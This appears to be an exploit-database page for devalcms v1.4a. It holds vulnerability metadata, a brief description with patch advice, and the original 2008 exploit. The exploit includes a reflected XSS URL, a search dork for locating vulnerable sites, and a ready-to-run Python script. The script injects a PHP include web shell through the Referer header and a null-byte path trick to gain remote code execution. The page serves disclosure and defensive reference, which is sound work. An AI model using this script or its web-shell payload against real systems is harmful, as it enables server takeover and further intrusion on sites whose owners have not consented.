header-logo
Suggest Exploit
vendor:
devalcms
by:
IRCRASH (R3d.W0rm (Sina Yazdanmehr))
9.3
CVSS
HIGH
Remote Code Execution / XSS
79
CWE
Product Name: devalcms
Affected Version From: v1.4a
Affected Version To: v1.4a
Patch Exists: YES
Related CWE: N/A
CPE: a:devalcms:devalcms:1.4a
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

devalcms v1.4a Remote Code Execution Exploit / Xss

A vulnerability exists in devalcms v1.4a which allows an attacker to execute arbitrary code on the vulnerable system. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious JavaScript code to the vulnerable application. This can be done by sending a malicious HTTP request to the vulnerable application with the ‘currentpath’ parameter set to a malicious JavaScript code.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of the application.
Source

Exploit-DB raw data:

#!/usr/bin/python
#####################################################################################
####           devalcms v1.4a Remote Code Execution Exploit / Xss                ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
#####################################################################################
#                                                                                   #
#Download : http://www.sourceforge.net/projects/devalcms                            #
#                                                                                   #
#DORK : "powered by devalcms v1.4.a"                                                #
#                                                                                   #
#####################################################################################
#                                      [Xss]                                        #
#                                                                                   #
#http://Site/[path]/index.php?currentpath=<script>alert('Xss')</script>             #
#                                                                                   #
#####################################################################################
#                                                                                   #
#                           [Remote Code Execution]                                 #
#                                                                                   #
#Use this exploit for remote code execution valun .                                 #
#                                                                                   #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################
import sys,socket
argv=sys.argv
data='<?php include $_GET[\'evil\']; ?>'
query='/modules/tool/hitcounter.php?gv_folder_data=./url2header.php%00'
if len(argv) < 3 :
    print '[*]Devalcms v1.4.a Remote code execut exploit'
    print '[*]Dork : powered by devalcms v1.4.a'
    print '[*]Powered by : R3d.W0rm'
    print '[*]Our Site : http://ircrash.com'
    print '[*]Usage : ' + argv[0] + ' site /path'
    exit()
if 'http://' in argv[1] :
    target=argv[1].replace('http://','')
else :
    target=argv[1]
if '/' in argv[2] :
    path=argv[2]
else :
    path='/' + argv[2]
print '[*]Devalcms v1.4.a Remote code execut exploit'
print '[*]Powered by : R3d.W0rm'
print '[*]Our Site : http://ircrash.com'
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target,80))
sock.send("GET " + path + query + " HTTP/1.1\n")
sock.send("Host: " + target + "\n")
sock.send("Referer: " + data + "\n\n\n")
recv=sock.recv(2048)
if 'HTTP/1.1 200 OK' in recv :
    print '[+]Code injected .'
    print '[+]Code inject in http://: ' + target + path + '/modules/tool/url2header.php'
else :
    print '[-]Can not inject code.'
exit()

# milw0rm.com [2008-09-05]